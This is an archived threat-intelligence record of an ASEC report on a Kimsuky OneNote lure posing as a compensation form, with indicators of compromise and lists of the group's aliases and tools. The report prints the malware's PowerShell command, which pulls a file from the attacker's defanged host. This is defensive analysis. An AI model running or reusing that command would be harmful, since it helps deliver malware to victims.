{
	"id": "9cfb954c-eaf2-4b4e-af71-5e9621072748",
	"created_at": "2026-04-06T00:06:32.987544Z",
	"updated_at": "2026-04-10T03:37:40.933897Z",
	"deleted_at": null,
	"sha1_hash": "7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7",
	"title": "OneNote Malware Disguised as Compensation Form (Kimsuky) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2248389,
	"plain_text": "OneNote Malware Disguised as Compensation Form (Kimsuky) -\r\nASEC\r\nBy ATCP\r\nPublished: 2023-03-19 · Archived: 2026-04-05 13:16:29 UTC\r\nAhnLab Security Emergency response Center (ASEC) has discovered the distribution of a OneNote malware\r\ndisguised as a form related to compensation. The confirmed file is impersonating the same research center as the\r\nLNK-type malware covered in the post below. Based on the identical malicious activity performed by the VBS\r\nfiles, the team has deduced that the same threat actor is behind both incidents.\r\nAs shown in the figure below, a page discussing compensation appears when the OneNote file is opened, and\r\nprompts users to click on what appears to be the area where an HWP file is attached.\r\nhttps://asec.ahnlab.com/en/50303/\r\nPage 1 of 4\n\nFigure 1. Contents displayed upon opening the OneNote file\r\nFigure 2 makes it clear that this area does not contain an HWP file; rather, it conceals a malicious script object\r\nnamed ‘personal.vbs’.\r\nFigure 2. Concealed malicious script\r\nIf a user clicks on this script, the malicious VBS file is created and executed under the filename personal.vbs in a\r\ntemporary directory. The code of the generated VBS file makes the following obfuscated command appear to be a\r\ncomment, then re-reads it to decrypt and execute the malicious command.\r\nFigure 3. personal.vbs code\r\nThe decrypted script code ultimately accesses hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1 to\r\nexecute an additional script code. This URL is currently inaccessible, but its URL format reveals that it most likely\r\nexecuted an information-stealing script like the one in the post below.\r\nAfterward, it downloads and opens an HWP file from hxxp://delps.scienceontheweb.net/ital/info/sample.hwp\r\nthrough a PowerShell command.\r\nExecuted PowerShell command: powershell $curpath=(New-Object -ComObject Shell.Application).NameSpace('shell:Downloads').Self.Path;Invoke-WebRequest -Uri hxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpath\\personal.hwp;start-sleep -seconds 1\r\nFigure 4. Ultimately executed script code\r\nAlthough the HWP file could not be downloaded during the time of analysis, it is presumed that a normal HWP\r\nfile was used in order to deceive users. Additionally, as the filename of the HWP file in the OneNote is the same\r\nas the filename (PersonalDataUseAgreement.hwp) shown in Figure 10 of the post \u003cMalware Distributed\r\nDisguised as a Password File\u003e (PersonalInfoUseAgreement.hwp), it is assumed that a similar HWP file was used\r\nin this case as well.\r\nDue to recent confirmed cases of the Kimsuky group distributing malware in various forms such as CHM, LNK,\r\nand OneNote, which were previously distributed as Word files, users are strongly advised to exercise extra\r\ncaution. These files are usually distributed via emails disguised as forms related to compensation or personal\r\ninformation, so users must practice caution when opening email attachments.\r\n[File Detection] Dropper/MSOffice.Generic (2023.03.20.02) Trojan/VBS.Generic.SC186657 (2023.03.03.00)\r\nMD5\r\naa756b20170aa0869d6f5d5b5f1b7c37\r\nf2a0e92b80928830704a00c91df87644\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//delps[.]scienceontheweb[.]net/ital/info/list[.]php?query=1\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/50303/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/50303/"
	],
	"report_names": [
		"50303"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433992,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7.pdf",
		"text": "https://archive.orkl.eu/7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7.txt",
		"img": "https://archive.orkl.eu/7e5bcc9b5ab7d25c428cd5a1b662f926bd1b3cb7.jpg"
	}
}